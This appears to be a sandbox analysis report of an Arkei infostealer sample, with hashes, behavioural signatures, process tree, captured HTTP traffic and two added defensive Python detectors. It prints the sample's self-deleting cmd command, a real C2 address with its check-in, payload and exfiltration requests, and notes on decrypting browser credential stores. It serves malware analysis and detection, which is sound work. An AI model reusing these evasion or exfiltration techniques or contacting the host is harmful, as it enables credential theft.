Analysis

  • max time kernel
    37s
  • max time network
    39s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    07/07/2022, 15:10 UTC

General

  • Target

    ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe

  • Size

    362KB

  • MD5

    0a0503dce0e780c82d119fa033577cfe

  • SHA1

    0e577608c1f0766c6d1e88f8a081fc58663517e8

  • SHA256

    ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c

  • SHA512

    220674cdda4162e2130b96a40340966d78bb0962edcf0ec50bf0b9e210b5b8f25b4d4863ef6118c48614833dd10c4fbae7f305043f13d1c831040a02954bbbbe

Malware Config

Extracted

Family

arkei

Botnet

Default

Signatures

  • Arkei

    Arkei is an infostealer written in C++. Vidar and Mars Stealer descend from the Arkei code base and reuse its HTTP C2 scheme, which is why the Suricata rules below, written for those variants, also fire on this Arkei sample's traffic.

  • suricata: ET MALWARE Win32/Vidar Variant/Mars CnC Activity (GET)
  • suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil

  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers target stored browser data: saved logins, cookies, autofill entries and history. The mozglue.dll and nss3.dll dropped under \ProgramData (see Downloads) are the Mozilla NSS runtime a stealer loads to decrypt Firefox's credential store; Chromium-based browsers need no extra libraries.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The canned signature text calls this likely ransomware behaviour; for an infostealer the same drive enumeration is more consistent with locating files to harvest, so read it together with the rest of the report rather than on its own.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe
    "C:\Users\Admin\AppData\Local\Temp\ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe" & exit
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:1508
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 5
        3⤵
        • Delays execution with timeout.exe
        PID:1476
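The process tree above is the classic delayed self-deletion: the sample spawns cmd.exe, which sleeps five seconds with timeout.exe and then deletes the original executable so it is gone before an analyst looks for it. The following detection logic is an added example, not tria.ge code or anything from the sample; it runs over process-creation records constructed from the tree above (the sample's own parent PID and the record field names are assumptions) and flags a cmd.exe whose `del` target is its parent's image path.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the executed image, as logged by the sandbox/EDR
    cmdline: str   # command line, as logged


SAMPLE_PATH = (r"C:\Users\Admin\AppData\Local\Temp"
               r"\ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe")

# Constructed from the Processes section of the report. The parent PID of the
# sample (1000) is an assumption; the report does not show it. The cmd.exe
# command line names System32 while the logged image is SysWOW64 (WOW64
# redirection for the 32-bit sample), so matching is done on the image path.
SAMPLE_EVENTS = [
    ProcEvent(1972, 1000, SAMPLE_PATH, '"' + SAMPLE_PATH + '"'),
    ProcEvent(1508, 1972, r"C:\Windows\SysWOW64\cmd.exe",
              '"C:\\Windows\\System32\\cmd.exe" /c timeout /t 5 & del /f /q "'
              + SAMPLE_PATH + '" & exit'),
    ProcEvent(1476, 1508, r"C:\Windows\SysWOW64\timeout.exe", "timeout /t 5"),
]

# Constructed benign tree: explorer.exe runs cmd.exe to delete an unrelated file.
BENIGN_EVENTS = [
    ProcEvent(900, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(901, 900, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c del /q "C:\\Users\\Admin\\AppData\\Local\\Temp\\install.log"'),
]

# "del [/switches] <target>", target optionally quoted, ending at "&" or end of line.
DEL_RE = re.compile(r'\bdel\s+(?:/[a-z]\s+)*"?([^"&]+?)"?\s*(?:&|$)', re.IGNORECASE)
# "timeout /t N" is the delay used here; a "ping -n" sleep would need a second pattern.
DELAY_RE = re.compile(r'\btimeout(?:\.exe)?\s+/t\s+(\d+)', re.IGNORECASE)


def find_self_delete(events):
    """Return one finding per cmd.exe whose 'del' target is its own parent's image."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if not ev.image.lower().endswith("\\cmd.exe"):
            continue
        parent = by_pid.get(ev.ppid)
        if parent is None:
            continue
        for m in DEL_RE.finditer(ev.cmdline):
            if m.group(1).strip().lower() != parent.image.lower():
                continue
            delay = DELAY_RE.search(ev.cmdline)
            findings.append({
                "cmd_pid": ev.pid,
                "parent_pid": parent.pid,
                "target": parent.image,
                "delay_seconds": int(delay.group(1)) if delay else None,
            })
    return findings


if __name__ == "__main__":
    for hit in find_self_delete(SAMPLE_EVENTS + BENIGN_EVENTS):
        print(hit)
```

Matching on the parent's image path rather than on the literal `timeout /t 5 & del` string keeps the rule robust to changes in the delay value or switch order, and the benign record shows that an ordinary cmd.exe deletion of some other file does not trigger it.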

Network

    Country: AZ
    GET
    http://46.23.109.160/jfdjc.php
    ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe
    Remote address:
    46.23.109.160:80
    Request
    GET /jfdjc.php HTTP/1.1
    Host: 46.23.109.160
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Jul 2022 15:11:08 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Set-Cookie: PHPSESSID=b3ffapqnpi3ogro60ut6epbf9s; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 28
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Country: AZ
    GET
    http://46.23.109.160/request
    ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe
    Remote address:
    46.23.109.160:80
    Request
    GET /request HTTP/1.1
    Host: 46.23.109.160
    Cache-Control: no-cache
    Cookie: PHPSESSID=b3ffapqnpi3ogro60ut6epbf9s
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Jul 2022 15:11:08 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Last-Modified: Mon, 21 Feb 2022 12:34:00 GMT
    ETag: "17e499-5d88672651e00"
    Accept-Ranges: bytes
    Content-Length: 1565849
    Country: AZ
    POST
    http://46.23.109.160/jfdjc.php
    ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe
    Remote address:
    46.23.109.160:80
    Request
    POST /jfdjc.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----YUAI5X4W47GV3EUS
    Host: 46.23.109.160
    Content-Length: 62169
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: PHPSESSID=b3ffapqnpi3ogro60ut6epbf9s
    Response
    HTTP/1.1 200 OK
    Date: Thu, 07 Jul 2022 15:11:11 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 0
    Keep-Alive: timeout=5, max=98
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • 46.23.109.160:80
    URL: http://46.23.109.160/jfdjc.php
    Protocol: http
    Process: ac4e6130232c4f7f8d7166b0004366c1e078f93b51addcf8080c28b1fac5d12c.exe
    Sent: 95.5kB
    Received: 1.6MB
    Packets sent / received: 720 / 1214

    HTTP Request

    GET http://46.23.109.160/jfdjc.php

    HTTP Response

    200

    HTTP Request

    GET http://46.23.109.160/request

    HTTP Response

    200

    HTTP Request

    POST http://46.23.109.160/jfdjc.php

    HTTP Response

    200
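The three captured requests form a sequence worth recognising in proxy or Zeek-style HTTP logs: a GET to the PHP gate that returns only 28 bytes (and sets the session cookie reused by every later request), a GET to /request that pulls down 1,565,849 bytes (a size consistent with a bundle of the helper DLLs that later appear under \ProgramData), and a 62,169-byte multipart/form-data POST back to the same PHP gate, which is the exfiltration the second Suricata rule flags. The heuristic below is an added example, not tria.ge code and not the ET rule's content-matching logic: it walks per-host transaction records (constructed from the requests above, with record field names and the size thresholds as assumptions) and reports hosts that complete the gate, payload and exfil stages in that order.

```python
import ipaddress
from dataclasses import dataclass


@dataclass
class HttpTxn:
    host: str
    method: str
    path: str
    req_len: int = 0          # request Content-Length
    resp_len: int = 0         # response Content-Length
    req_content_type: str = ""


# Constructed from the three captured requests in the report.
SAMPLE_TXNS = [
    HttpTxn("46.23.109.160", "GET", "/jfdjc.php", 0, 28),
    HttpTxn("46.23.109.160", "GET", "/request", 0, 1565849),
    HttpTxn("46.23.109.160", "POST", "/jfdjc.php", 62169, 0,
            "multipart/form-data; boundary=----YUAI5X4W47GV3EUS"),
]

# Constructed benign traffic: a normal PHP page view and an ordinary form post.
BENIGN_TXNS = [
    HttpTxn("shop.example", "GET", "/index.php", 0, 18432),
    HttpTxn("shop.example", "POST", "/login.php", 310, 1024,
            "application/x-www-form-urlencoded"),
]


def is_bare_ip(host: str) -> bool:
    """True when the Host header is a literal IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_stealer_sequences(txns, gate_max=256, payload_min=500_000, exfil_min=10_000):
    """Per host, look for a small GET to a .php gate, then a large GET payload,
    then a multipart POST back to the same gate path, in that order.
    Thresholds are assumptions chosen around the sizes seen in the report."""
    by_host = {}
    for t in txns:
        by_host.setdefault(t.host, []).append(t)

    findings = []
    for host, seq in by_host.items():
        gate_path = None
        payload = None
        for t in seq:
            if gate_path is None:
                if (t.method == "GET" and t.path.lower().endswith(".php")
                        and t.resp_len <= gate_max):
                    gate_path = t.path
            elif payload is None:
                if t.method == "GET" and t.resp_len >= payload_min:
                    payload = t
            elif (t.method == "POST" and t.path == gate_path
                    and t.req_content_type.lower().startswith("multipart/form-data")
                    and t.req_len >= exfil_min):
                findings.append({
                    "host": host,
                    "bare_ip": is_bare_ip(host),
                    "gate": gate_path,
                    "payload_bytes": payload.resp_len,
                    "exfil_bytes": t.req_len,
                })
                break
    return findings


if __name__ == "__main__":
    for finding in find_stealer_sequences(SAMPLE_TXNS + BENIGN_TXNS):
        print(finding)
```

The ordering check is what separates this from a plain "multipart POST to a PHP script" rule, which would fire on every file upload form; the bare-IP flag is reported alongside rather than required, since the same stealer families are also served from domains.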

Downloads

  • \ProgramData\mozglue.dll

    Filesize

    133KB

    MD5

    8f73c08a9660691143661bf7332c3c27

    SHA1

    37fa65dd737c50fda710fdbde89e51374d0c204a

    SHA256

    3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

    SHA512

    0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

  • \ProgramData\nss3.dll

    Filesize

    1.2MB

    MD5

    bfac4e3c5908856ba17d41edcd455a51

    SHA1

    8eec7e888767aa9e4cca8ff246eb2aacb9170428

    SHA256

    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

    SHA512

    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

  • memory/1972-57-0x0000000075F21000-0x0000000075F23000-memory.dmp

    Filesize

    8KB

  • memory/1972-59-0x0000000000400000-0x0000000000A8B000-memory.dmp

    Filesize

    6.5MB

  • memory/1972-60-0x0000000060900000-0x0000000060992000-memory.dmp

    Filesize

    584KB

  • memory/1972-58-0x0000000000C3B000-0x0000000000C5C000-memory.dmp

    Filesize

    132KB

  • memory/1972-55-0x0000000000230000-0x0000000000259000-memory.dmp

    Filesize

    164KB

  • memory/1972-56-0x0000000000400000-0x0000000000A8B000-memory.dmp

    Filesize

    6.5MB

  • memory/1972-82-0x0000000000C3B000-0x0000000000C5C000-memory.dmp

    Filesize

    132KB

  • memory/1972-83-0x0000000000400000-0x0000000000A8B000-memory.dmp

    Filesize

    6.5MB

  • memory/1972-54-0x0000000000C3B000-0x0000000000C5C000-memory.dmp

    Filesize

    132KB
